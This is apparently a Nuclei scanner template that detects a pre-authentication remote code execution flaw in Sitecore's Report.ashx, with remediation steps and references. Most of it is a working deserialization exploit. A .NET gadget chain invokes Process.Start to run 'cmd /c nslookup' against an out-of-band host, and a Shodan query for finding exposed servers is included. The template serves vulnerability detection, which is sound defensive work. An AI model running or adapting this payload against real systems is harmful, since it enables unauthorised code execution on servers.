113 lines
8.1 KiB
YAML
113 lines
8.1 KiB
YAML
id: sitecore-pre-auth-rce
|
|
|
|
info:
|
|
name: Sitecore Experience Platform Pre-Auth RCE
|
|
author: pdteam
|
|
severity: critical
|
|
description: This issue is related to a remote code execution vulnerability through insecure deserialization in the Report.ashx file. This file was used to drive the Executive Insight Dashboard (of Silverlight report) that was deprecated in 8.0 Initial Release.
|
|
tags: rce,sitecore,deserialization,oast
|
|
reference:
|
|
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
|
|
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
|
|
remediation:
|
|
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
|
|
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
|
|
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
|
|
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
metadata:
|
|
shodan-query: http.title:"SiteCore"
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
|
|
<?xml version="1.0" ?>
|
|
<a>
|
|
<query></query>
|
|
<source>foo</source>
|
|
<parameters>
|
|
<parameter name="">
|
|
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
|
|
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
|
|
xmlns:x="http://www.w3.org/2001/XMLSchema"
|
|
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
|
|
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
|
|
xmlns="">2</Count>
|
|
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
|
|
xmlns="">
|
|
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
|
|
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
|
|
xmlns:a="http://schemas.datacontract.org/2004/07/System">
|
|
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
|
|
xmlns="">
|
|
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
|
|
<a:delegateEntry z:Id="7">
|
|
<a:assembly z:Ref="6" i:nil="true"/>
|
|
<a:delegateEntry i:nil="true"/>
|
|
<a:methodName z:Id="8">Compare</a:methodName>
|
|
<a:target i:nil="true"/>
|
|
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
|
|
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
|
|
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
|
</a:delegateEntry>
|
|
<a:methodName z:Id="11">Start</a:methodName>
|
|
<a:target i:nil="true"/>
|
|
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
|
|
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
|
|
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
|
</Delegate>
|
|
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
|
xmlns=""
|
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
|
<Name z:Ref="11" i:nil="true"/>
|
|
<AssemblyName z:Ref="12" i:nil="true"/>
|
|
<ClassName z:Ref="13" i:nil="true"/>
|
|
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
|
|
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
|
|
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
|
<GenericArguments i:nil="true"/>
|
|
</method0>
|
|
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
|
xmlns=""
|
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
|
<Name z:Ref="8" i:nil="true"/>
|
|
<AssemblyName z:Ref="6" i:nil="true"/>
|
|
<ClassName z:Ref="9" i:nil="true"/>
|
|
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
|
|
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
|
|
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
|
<GenericArguments i:nil="true"/>
|
|
</method1>
|
|
</_comparison>
|
|
</Comparer>
|
|
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
|
|
xmlns="">2</Version>
|
|
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
|
|
xmlns="">
|
|
<string z:Id="25"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
|
|
<string z:Id="26"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
|
|
</Items>
|
|
</ArrayOfstring>
|
|
</parameter>
|
|
</parameters>
|
|
</a>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "System.ArgumentNullException" |